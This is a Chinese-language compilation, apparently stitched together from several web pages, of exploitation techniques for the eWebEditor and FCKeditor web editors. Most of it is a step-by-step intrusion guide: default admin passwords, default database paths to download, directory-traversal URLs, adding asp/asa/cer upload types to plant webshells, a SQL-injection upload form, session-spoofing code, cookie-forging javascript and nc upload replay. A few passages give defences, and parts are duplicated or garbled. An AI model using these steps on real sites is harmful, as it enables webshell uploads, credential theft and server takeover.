ewebeditor编辑器漏洞
ewebeditor漏洞利用总结
ewebeditor漏洞利用总结ewebeditor漏洞利用总结先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。
默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp 来进行说明,下面不再细说了!) 2、默认管理帐号密码!默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。
3、默认数据库地址。
如果密码不是默认的。
我们就访问是不是默认数据库!尝试下载数据库得到管理员密码!管理员的帐号密码,都在eWebEditor_System表段里,sys_UserName Sys_UserPass 都是md5加密的。
得到了加密密码。
可以去 cmd5 等网站进行查询!暴力这活好久不干了!也可以丢国外一些可以跑密码的网站去跑! 默认数据库路径为: ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asaewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa ewebeditor/db/#ewebeditor.mdbewebeditor/db/!@#ewebeditor.aspewebeditor/db/ewebeditor1033.mdb 等很多管理员常改.asp后缀,一般访问.asp .asa 后缀的都是乱码!可以用下载工具下载下来,然后更改后缀为.mdb 来查看内容! 4、说说漏洞基本利用步骤,还以asp为例!登陆后台以后。
选择样式管理,默认编辑器的默认样式都不可以修改的。
我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。
Ewebeditor
Ewebeditor拿站的最新技巧集合:Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。
这个方法有%80的几率能拿下目标!-------------------------------------------------------------------------------------eWebEditor的另类入侵有一个办法可以在没有登陆eWebEditor的情况下传我们的ASP或ASA木马,但是前提条件是在数据库中的eWebeditor_Style表中上传类型有aaspsp或asa 等后缀,如果有,用ewebeditor.asp来上传,它的语法是:http://网站名/ewebeditor/ewebeditor.asp?id=S_ID&style=S_Name,其中S_ID是在eWebeditor_Style表中有aaspsp或asa后缀的那一行的S_ID,S_Name是在eWebeditor_Style表中有aaspsp或asa后缀的那一行的S_Name字段名称。
出现我们熟悉的eWebSoft在线编辑器的界面,就可以在相应的有aaspsp或asa 等后缀的类型中上传了相应的asp或asa木马。
这种情况也是存在的,大都是先前网站被人入侵过,管理员把admin_login.asp、admin_style.asp、admin_default.asp等文件删了,但是忘了删除数据库中的aaspsp或asa等后缀,这样就造成可以不用登陆就可以上传木马。
或者是入侵者修改密码,密码破解不了,但是他忘了擦掉脚印了-------------------------------------------------------------------------------------ewebeditor后台地址: ewebeditor/admin_login.asp 默认用户名密码都是admin adminewebeditor数据库地址: DB/Ewebeditor.mdb1ewebeditor遍历路径漏洞(当数据库只读的时候)ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=..再加 &dir=../..&dir=/../.. 看到整个网站文件了本帖隐藏的内容需要回复才可以浏览2进入后台添加aaspsp文件,可以直接上传asp文件。
ewebeditor漏洞总结
ewebeditor漏洞总结漏洞总结:Internet是一个非常便利的工具,在我们的日常工作和生活中发挥着重要的作用。
不可否认的是,Internet也存在着一些安全问题和漏洞。
其中一个重要的漏洞是ewebeditor的漏洞。
首先,ewebeditor存在一个文件上传漏洞。
黑客可以通过向服务器上传恶意文件来执行任意代码,这将导致许多安全问题,例如获取管理员权限、删除或篡改网站文件等。
为了防止这种漏洞的利用,我们应该及时更新ewebeditor的版本,以及限制上传文件的类型和大小。
第二个漏洞是XSS(跨站脚本)漏洞。
黑客可以通过在表单提交的数据中注入恶意脚本来实施XSS攻击。
一旦用户访问受到漏洞影响的页面,他们的个人信息就可能被泄露,包括登录凭据、银行账户信息等。
为了防止这种漏洞的利用,我们应该对用户输入进行严格的过滤和验证,并使用适当的转义字符。
此外,ewebeditor还存在一个SQL注入漏洞。
黑客可以在表单提交的数据中注入恶意的SQL语句,从而获得对数据库的非法访问。
这将导致许多安全问题,包括数据泄露、数据丢失等。
为了防止这种漏洞的利用,我们应该使用准备好的SQL语句和参数化查询,以防止用户提交的数据被当作代码执行。
在防止ewebeditor漏洞利用的过程中,我们还应该加强对系统的监控和日志记录。
通过实时监测系统的安全事件和漏洞扫描,我们可以及时发现并解决潜在的安全问题。
此外,对用户的行为进行日志记录也是很重要的,这将有助于我们了解异常操作和非法访问的情况。
总之,ewebeditor是一个非常常见且易受攻击的漏洞。
为了保护我们的系统和数据安全,我们应该认识到漏洞的存在,并采取适当的措施来预防和解决漏洞问题。
只有不断学习和更新我们的安全知识,我们才能更好地应对不断变化的网络环境。
问题ewebeditor编辑器突破安全狗
27 sStyleInitMode = Request("d_initmode")
28 sStyleBaseUrl = Request("d_baseurl")
他的数据接受都是request,也就是说他会接受post和get和cookie提交上去的数据。
当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。
1.问题ewebeditor
2.服务器装有安全狗
下面是我测试的过程:
首先当然是增加样式,但是常规的post提交失败,于是我想到了想这样的在老程序他一般都是使用request接受数据的,于是乎我下载了源码看了下,如果如此:
06 sStyleBaseHref = Trim(Request("d_basehref"))
07 sStyleContentPath = Trim(Request("d_contentpath"))
08 sStyleWidth = Trim(Request("d_width"))
09 sStyleHeight = Trim(Request("d_height"))
10 sStyleMemo = Request("d_memo")
11 sStyleImageExt = Request("d_imageext")
12 sStyleFlashExt = Request("d_flashext")
ewebedit漏洞总结及解决方法
ewebedit漏洞总结及解决方法ewebedit漏洞总结及解决方法2010-04-12 15:26:27| 分类:网站建设| 标签:|字号大中小订阅/admin_login.asp admin/adminadmin888/db/ewebeditor.mdbewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=..再加&dir=../..&dir=../../../.. 看到整个网站文件了eWebEditor/admin_login.aspeWebEditor/db/ewebeditor.mdbeWebEditor/ewebeditor.aspeWebEditor/uploadfile/这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞。
判断网站是否使用了eWebEditor查看程序源代码,看看源码中是否存在类似“ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器。
另外一种方法就是站上新闻或者其他板块上找图片、附件等的链接,是否为admin/eWebEditor/UploadFile/xxxx.jpg之类格式。
安全漏洞管理员未对编辑器的数据库路径和名称进行修改,导致可以利用编辑器默认路径直接对网站数据库进行下载。
管理员未对编辑器的用户登录路径进行修改,导致黑客可以利用网站数据库所获得的用户名和密码直接登陆编辑器管理后台。
该WEB编辑器上传程序存在的安全漏洞。
一、ASP版1.关键文件的名称和路径这个版本其实个人感觉是影响最大,使用最多的一个了吧,早期很多asp站都用这个,当然现在也是大量的存在的……几个关键文件的名称和路径:Admin_Login.asp 登录页面Admin_Default.asp 管理首页Admin_Style.aspAdmin_UploadFile.aspUpload.aspAdmin_ModiPwd.aspeWebEditor.aspdb/ewebeditor.mdb 默认数据库路径2.默认用户名密码一般用这个的默认后台的URL都是默认的:/admin/ewebeditor/login_admin.asp类似:/ewebeditor/login_admin.asp/admin/eweb/login_admin.asp/admin/editor/login_admin.asp而且账户和密码也基本都是默认的:admin admin (admin888)3.下载数据库还有如果默认的账户和密码修改了,我们可以下载他的数据库,然后本地破解MD5了.默认数据库:…/db/ewebeditor.mdb 或者…/db/ewebeditor.asp,一般下载数据库后打开察看就可以了。
ewebeditor漏洞
ewebeditor漏洞概述ewebeditor是一款常见的富文本编辑器,广泛应用于网站开发中。
然而,由于其设计和实现的不完善,存在一些漏洞,可能导致恶意攻击者利用这些漏洞进行远程执行任意代码或者进行跨站脚本攻击(XSS)等攻击行为。
漏洞类型根据漏洞的性质和影响范围,ewebeditor漏洞主要可以分为以下几种类型:1.任意文件上传漏洞:攻击者可以通过漏洞上传恶意文件,从而执行任意代码或获取敏感信息。
2.跨站脚本攻击漏洞(XSS):攻击者可以在受影响的网页中注入恶意JavaScript代码,当其他用户浏览该网页时,恶意代码就会执行。
攻击者可以利用XSS漏洞窃取用户登录凭证、劫持用户会话等。
3.信息泄露漏洞:敏感信息(如管理员密码、数据库连接字符串等)通过漏洞暴露给攻击者,导致安全风险。
4.路径遍历漏洞:攻击者可以通过漏洞访问或下载网站上的敏感文件,甚至获取到服务器上的敏感信息。
5.远程代码执行漏洞:攻击者可以通过漏洞执行任意代码,从而完全控制服务器。
漏洞利用方式由于ewebeditor漏洞的公开性,攻击者可以通过多种方式对其进行利用。
以下是一些常见的漏洞利用方式:1.利用未授权访问:攻击者可以通过访问ewebeditor的后台管理接口,使用默认或弱密码登录,从而获取到管理权限。
2.利用文件上传漏洞:攻击者可以通过上传包含恶意代码的文件来执行任意命令或代码。
3.利用XSS漏洞:攻击者可以在受影响的网页中注入恶意JavaScript代码,从而获取到用户的敏感信息或进行其他恶意操作。
4.利用路径遍历漏洞:攻击者可以通过构造恶意请求,访问或下载网站上的敏感文件。
5.利用远程代码执行漏洞:攻击者可以通过漏洞执行任意代码,从而完全控制服务器。
漏洞防御措施为了保护ewebeditor以及网站安全,以下是一些常见的漏洞防御措施:1.及时更新漏洞版本:保持ewebeditor及相关插件的最新版本,及时修复已知漏洞。
【推荐】ewebeditor漏洞利用总结-实用word文档 (10页)
本文部分内容来自网络整理,本司不为其真实性负责,如有异议或侵权请及时联系,本司将立即删除!== 本文为word格式,下载后可方便编辑和修改! ==ewebeditor漏洞利用总结课件 4ewebeditor漏洞利用总结先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:1、首先访问默认管理页看是否存在。
默认管理页地址2.80以前为 ewebeditor/admin_login.asp以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)2、默认管理帐号密码!默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。
3、默认数据库地址。
如果密码不是默认的。
我们就访问是不是默认数据库!尝试下载数据库得到管理员密码!管理员的帐号密码,都在eWebEditor_System表段里,sys_UserName Sys_UserPass 都是md5加密的。
得到了加密密码。
可以去 等网站进行查询!暴力这活好久不干了!也可以丢国外一些可以跑密码的网站去跑!默认数据库路径为: ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asa ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asa ewebeditor/db/#ewebeditor.mdbewebeditor/db/!@#ewebeditor.asp ewebeditor/db/ewebeditor1033.mdb 等很多管理员常改.asp后缀,一般访问.asp .asa 后缀的都是乱码!可以用下载工具下载下来,然后更改后缀为.mdb 来查看内容!4、说说漏洞基本利用步骤,还以asp为例!登陆后台以后。
如何检查并堵住网站的eWebEditor漏洞-电脑资料
如何检查并堵住网站的eWebEditor漏洞-电脑资料一、判断网站是否使用了eWebEditor的简单方法:查看程序源代码,看看源码中是否存在类似“ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器,。
二、该WEB编辑器可能被利用攻击的安全漏洞:(1)管理员未对编辑器的数据库路径和名称进行修改,导致可以利用编辑器默认路径直接对网站数据库进行下载。
(2)管理员未对编辑器的用户登录路径进行修改,导致可以利用网站数据库所获得的用户名和密码直接登陆编辑器管理后台。
(3)该WEB编辑器上传程序存在的安全漏洞:请看Upload.asp文件,程序中有这么一段表达式:sAllowExt = Replace(UCase(sAllowExt), "ASP", "")任何情况下都不允许上传asp脚本文件但该语句仅过滤了ASP文件,未同时过滤ASA、CER等文件,电脑资料《如何检查并堵住网站的eWeb Editor漏洞》(https://)。
上述两类文件同样可以构成ASP程序后门程序。
还能利用在上传程序类型中增加“aaspsp”来绕过此方法对扩展名的过滤,根据该语句的过滤规则,“aaspsp”过滤了“asp”字符后,反而变成了“asp”,这种类似的漏洞利用方法也可以运用在动网论坛7.0 sp2中。
总结面对此种威胁网站管理员应该做好如下的防范措施:1、使用了eWebEditor编辑器的网站,应及时修改该编辑器的默认数据库路径和后缀名,防止数据库被非法下载2、修改编辑器后台登陆路径和默认的登陆用户名和密码,防止进入后台管理界面3、对Upload.asp语句进行修改,防止利用其上传ASP木马从而获得WEB权限4、及时对网站服务器IIS配置中的应用程序扩展名映射进行整理,确保其它类型的文件不能在服务器网站上运行。
编辑器漏洞合集
ewebeditor:基本知识:默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀)默认帐号密码为admin admin888 !常用的密码还有admin admin999 admin1 等默认数据库路径为ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asa ewebeditor/db/ewebeditor.asp ewebeditor/db/#ewebeditor.asaewebeditor/db/#ewebeditor.mdb ewebeditor/db/!@#ewebeditor.aspewebeditor/db/ewebeditor1033.mdb 等很多管理员常改.asp后缀,一般访问.asp .asa点击“样式管理”--可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏--将“插入图片”控件添加上。
而后 --预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。
当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell1、eWebEditor踩脚印式入侵:当我们下载数据库后查询不到密码MD5的明文时,可以去看看webeditor_style(14)这个样式表,看看是否有前辈入侵过或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的WEBSHELL.攻击利用比如 ID=46 s-name =standard1 构造代码: ewebeditor.asp?id=content&style=standard ID 和和样式名改过后 ewebeditor.asp?id=46&style=standard12、eWebEditor遍历目录漏洞:ewebeditor/admin_uploadfile.asp admin/upload.asp 过滤不严,造成遍历目录漏洞攻击利用:目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件第一种:ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=http://www.****.com/../.. 看到整个网站文件了第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..eWebEditor 5.2 列目录漏洞http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin3、WebEditor session欺骗漏洞,进入后台:漏洞文件:Admin_Private.asp 只判断了session,没有判断cookies和路径的验证问题。
Ewebeditor的一些漏洞总结推荐
Ewebeditor的⼀些漏洞总结推荐于是像windows⼀样被⿊客们挖掘出很多漏洞,⼤家莫急,笔者Minghacker总结前⼈基础,⼀⼀道来。
对于⽬前asp版本的ewebeditor编辑器漏洞主要分为以下7点:默认,遍历⽬录漏洞,⼀句话,注⼊,构造,cookie欺骗,社⼯(踩脚印⼊侵),NO1.ewebeditor编辑器⼀般默认数据库路径是db/ewebeditor.mdb默认的后台路径是admin_login.asp建议最好检测下admin_style.asp⽂件是否可以直接访问举例有个细节需要注意:有抄袭版的;SouthidcEditor数据库SouthidcEditor\Datas\SouthidcEditor.mdb没登陆页⾯。
利⽤⽅法:PopUp.asp页⾯传图⽚⼩马,nc提交,得shellNO2.遍历⽬录漏洞(具体如下):登陆编辑器---上传⽂件管理---选择样式⽬录(随便选⼀个⽬录)得到:ewebeditor/admin_uploadfile.asp?id=14在id=14后⾯添加&dir=..再加 &dir=../..&dir=../../../.. 看到整个⽹站⽂件了此漏洞危害⼤⼤的,绝对恐怖NO3.当数据库被管理员修改为asp、asa后缀的时候,可以插⼀句话⽊马服务端进⼊数据库,然后⼀句话⽊马客户端连接拿下webshellNO4.有的时候爆了数据库找不到后台地址让⼈发急,其实可以试试查看样式表,有没别⼈加⼊的asp、asa后缀样式表,也就是虽说的踩着脚印⼊侵。
还有的时候聪明的管理员也就是加“#”不妨社⼯试试,我可没少占便宜的例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdbNO5.注⼊2.1.6的注⼊就不多说了,如下保存为html⽂件修改action,直接上传cer马<H1>ewebeditor asp版 2.1.6 上传漏洞利⽤程序----</H1><br><br><form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union selectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style wheres_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100><br><br><input type=submit value=Fuck></form>有次⽆意的⼊侵使我发现了ewebeditor2.7.0版本的存在注⼊漏洞简单利⽤就是http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利⽤nbsi进⾏猜解,对此进⾏注⼊取得账号密码NO6.有的时候管理员不让复制样式,但是你⼜看到有个样式被别⼈以前⼊侵修改了存在asa或者之类可以传shell,但是上传插⼊⼯具没有,⼜⽆法修改怎么办那?也许很多⼈说应该可以加⼯具栏,但是我就遇见过不让加的这样我们可以利⽤ewebeditor⾥的upload.asp⽂件进⾏本地构造进⾏上传具体如下:在action下⾯<form action="" >><input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value"><input type="submit" name="uploadfile" value="提交"><input type=hidden name=originalfile value=""></form>------------------------------------------------------------------------------------------------------------------------------------------------<input type="submit" name="uploadfile" value="提交"> 放在action后头,适合⽤于在ewebeditor后台那个预览那⾥出来的⽐如上传图⽚那⾥,有些时候上传页⾯弹不出来,就可以⽤upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库⾥上传类型有ASA才可以传得上。
编辑器漏洞总结
site:editor inurl:asp?id inurl:ewebeditornet比如常见的编辑器漏洞有:ewebeditorewebeditornetfckeditoreditorsouthidceditorSouthidcEditorbigcneditor一:ewebeditor为例1:默认下载下来的后台:/ewebeditor/admin_login.asp后台如果能进入:可点击样式管理:standard 拷贝一份(直接修改改不了)在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览在编辑器里点设计然后直接上传asa大马.上传后在代码里可以看到马的位置!(原理:因为在iis里网站的属性里应用程序配置一项asa扩展名还是用asp.dll来解析的,asp 也是还有cer cdx )在cer cdx asa的被删掉那么马儿就找不到映射不过去.可以在拷贝过后的样式图片类型里加入aaspsp 然后在上传直接就可以上传asp文件2:下载默认数据库/ewebeditor/db/ewebeditor.mdb然后分析数据库webeditor_system(1) 就可以看到用户名和密码如果破解不出来可以在webeditor_style(14 样式表里主要看允许上传文件的扩展名(s-fileext s_ingeext)看到一个小黑客曾经搞过多了asa aaspsp可以用他来利用!(后台找不到的情况下也可以用此方法)可以构造语句:比如ID=46 s-name =standard1构造代码: ewebeditor.asp?id=content&style=standardID和和样式名改过后ewebeditor.asp?id=46&style=standard1然后就是进入编辑器上传asa 或者asp的得到webshell二:ewebeditornet 漏洞利用默认上传地址:/ewebeditornet/upload.aspx可以直接上传一个cer的木马在无法上传的情况下可以地址栏构造以下代码: javascript:lbtnUpload.click();然后查看源代码:找到uploadsave 找到地址默认传到uploadfile这个文件夹里(漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. )三:fckeditor 漏洞利用/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.a sp?Command=FileUpload&Type=Image&CurrentFolder=/就把文件名字段改成NEWfile 选择文件名可定义上传过后在/userfiles/image/找文件四:southidceditor/admin/southidceditor/datas/southidceditor.mdb/admin/southidceditor/popup.asp/admin/southidceditor/admin/admin_login.asp五:bigcneditor这个页不多说了原理都差不多!防范方法很简单就不多讲了,FCKeditor上传漏洞,/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type= all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:/UserFiles/all/1.asa"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.比如输入:/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type= monyer&Connector=connectors/asp/connector.asp所传的文件就到了/UserFiles/monyer/ 下了而如果这样输入:/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.所传的文件就到了网站根目录下了。
Ewebeditor漏洞
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
/ewebedito ... amp;style=full_v200
可以利用nbsi进行猜解,对此进行注入
2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了
3 后面的利用和asp一样,新增样式修改上传,就ok了
测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell
<input type="submit" name="uploadfile" value="提交">
<input type=hidden name=originalfile value="">
</form>
------------------------------------------------------------------------------------------------------------------------------------------------
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
精心整理 ewebeditor编辑器漏洞
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
利用方式:在上传文件管理页面随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..
⊙另外一个遍历目录的漏洞文件是ewebeditor/asp/browse.asp
利用方式如下:http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin
直接检测不行的,要写入特征字符。工具是不知道ewebeditor的表名的还有列名。先猜解表 开始猜解账号密码
5.首先先看eWebEditor/upload.asp 上传地址存在不
/ewebeditor2007/admin_style.asp?action=stylepreview&id=37
<input type=file name=uploadfile size=100 style="width:100%">
<input type=submit value="上传"></input>
eWebEditor网页在线编辑器常见漏洞及安全设置
R es p o ns e . E n d
NO. 1 7
无 线 互 联科 技 ・ 网 络 地 带
S e p t e mb e r ,2 0 l 5
保 证 了数 据库 的 安全 性 。
( 3 ) 调用 “ I n c l u d e / D e C o d e . a s p ” 文件 , 过 滤 估 计 的 不 安全 字 符如 “ a s a 、 c e r ” 等。
[ 参考文献]
[ 1 ] 冯立, 张景韶, 周利平. 基于B / S 模 式下的网络题 库平台研 究与实践 [ J ] . 重庆师范大学学报 :自 然科学版 , 2 0 1 2 ( 4 ) [ 2 ] 蒲玄及 , 杨百龙, 杨建飞. 基于A S P . N E T 的在线考试系统设计与实现 [ J ] . 现代 电子技术 , 2 0 0 8 ( 2 2 ) . [ 3 ] 张裔 智, 赵毅, 汤小斌. M D 5 算法研 究[ J ] . 计算机 科 学. 2 0 0 8 ( 7 ) . [ 4 4范振钧. ] 基于A S P . n e t , S 2 - 层 结构 实现 方法研究 [ J ] . 计算机科 学, 2 0 0 7 ( 4 ) . [ 5 ] 石晓珍 基于C O M 的通用题 库系统的设计与实现 [ J ] . 计算机 时代, 2 0 0 6 ( 8 ) .
代码 , 把 “ S t a r t u p . a s p ” 文 件 中的 S e r v e r . M a p P a t h ( d b / 些心 得体 会 , 目 的在 于广大 网站 开发者 相 互学习、 保 证 网站正 e w e b e d i t o r . m d b ) 更 改 为 相应 路 径 , 本 例 中应 更 改 为 常运 行。 观 点仅代 表 本人 意见 , 若 有不 对之 处 , 请 批 评 指正 。 S e r v e r . M a p P a t h ( '  ̄ y d a t a b a s e / # e w e b e d i t o r . a s p ) 。 这样 ,
Ewebeditor 5.5 列目录漏洞利用方法
默认数据库db/ewebeditor.mdb
默认帐号admin 密码admin或admin888
ewebeditor2007/admin_style.asp?action=stylepreview&id=37
直接检测不行的,要写入特征字符 表sys_username 密码sys_userpass
ewebeditor2007/ewebeditor.asp?id=article_content&style=full_v200
利用upload.asp文件,本地构造上传shell
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
后台登录
ewebeditor5.5 默认后台/admin/ewebeditor/admin/login.asp 默认密码admin
添加上传类型asp,调用用样式上传页ewebeditor/ewebeditor.htm?
id=body&style=popup直接上传asp大马。
遍厉网站
ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../一级跳转目录
ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../../二级跳转目录
2011年之前常见WEB编辑器漏洞手册重新整理版本
Web编辑器漏洞手册FCKeditor (7)FCKeditor编辑器页/查看编辑器版本/查看文件上传路径 (7)FCKeditor被动限制策略所导致的过滤不严问题 (8)利用2003路径解析漏洞上传网马 (8)FCKeditorPHP上传任意文件漏洞 (9)FCKeditorJSP上传文件路径 (9)TYPE自定义变量任意上传文件漏洞 (9)FCKeditor新闻组件遍历目录漏洞 (10)FCKeditor暴路径漏洞 (10)FCKeditor中webshell的其他上传方式 (10)FCKeditor文件上传“.”变“_”下划线的绕过方法 (10)eWebEditor (11)eWebEditor利用基础知识 (11)eWebEditor踩脚印式入侵 (12)eWebEditor遍历目录漏洞 (12)eWebEditor5.2列目录漏洞 (13)利用WebEditorsession欺骗漏洞,进入后台 (13)eWebEditorasp版2.1.6上传漏洞 (13)eWebEditor2.7.0注入漏洞 (13)eWebEditor2.8.0最终版删除任意文件漏洞 (13)eWebEditorv6.0.0上传漏洞 (14)eWebEditorPHP/ASP...后台通杀漏洞 .. (14)eWebEditorforphp任意文件上传漏洞 (14)eWebEditorJSP版漏洞 (14)eWebEditor2.8商业版插一句话木马 (15)eWebEditorNetupload.aspx上传漏洞(WebEditorNet) (15)southidceditor(一般使用v2.8.0版eWeb核心) (15)bigcneditor(eWeb2.7.5VIP核心) (15)CuteEditor (16)CuteEditor在线编辑器本地包含漏洞 (16)Webhtmleditor (16)利用WIN2003IIS文件名称解析漏洞获得SHELL (16)Kindeditor (16)利用WIN2003IIS文件名称解析漏洞获得SHELL (16)Freetextbox (17)Freetextbox遍历目录漏洞 (17)附录A: (17)附录B: (18)附录C: (18)•G P L License……虽然出于原意本人并不想为难大家阅读如此沉长的NotificationBut……智慧是众人的,至少要保证他人的利益不受侵犯!这是一种尊重、一种渴求真知的态度!我们虽不代表正义但也并非乌合/*************************************************************************** ** 本文当是个自由文档;* 你可以对本文当有如下操作* 可自由复制* 你可以将文档复制到你的或者你客户的电脑,或者任何地方;* 复制份数没有任何限制。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
默认后台地址:/ewebeditor/admin_login.asp
使用默认密码:admin/admin 或 admin/admin888
不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第六种方法
利用eWebEditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
eWebEditor遍历目录漏洞
脆弱描述:
ewebeditor/admin_uploadfile.asp
admin/upload.asp
过滤不严,造成遍历目录漏洞
攻击利用:
第一种:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
2、当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell
3、上传后无法执行?目录没权限?帅锅你回去样式管理看你编辑过的那个样式,里面可以自定义上传路径的!!!
4、设置好了上传类型,依然上传不了麽?估计是文件代码被改了,可以尝试设定“远程类型”依照6.0版本拿SHELL的方法来做(详情见下文↓),能够设定自动保存远程文件的类型。
过滤不严,造成遍历目录漏洞
攻击利用:
/ewebedito ... tandard650&dir=…././/..
利用WebEditor session欺骗漏洞,进入后台
脆弱描述:
漏洞文件:Admin_Private.asp
只判断了session,没有判断cookies和路径的验证问题。
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1":eval request("a个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。
eWebEditor
eWebEditor利用基础知识
默认后台地址:/ewebeditor/admin_login.asp
eWebEditor编辑器
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
/bakbak/edit/Admin_Login.asp
/bakbak/edit/db/ewebeditor.mdb
建议最好检测下admin_style.asp文件是否可以直接访问
默认数据库路径:[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb -- 某些CMS里是这个数据库
也可尝试 [PATH]/db/%23ewebeditor.mdb -- 某些管理员自作聪明的小伎俩
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
攻击利用:
新建一个test.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问test.asp,再访问后台任何文件,for example:Admin_Default.asp
eWebEditor asp版 2.1.6 上传漏洞
攻击利用:(请修改action字段为指定网址)
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
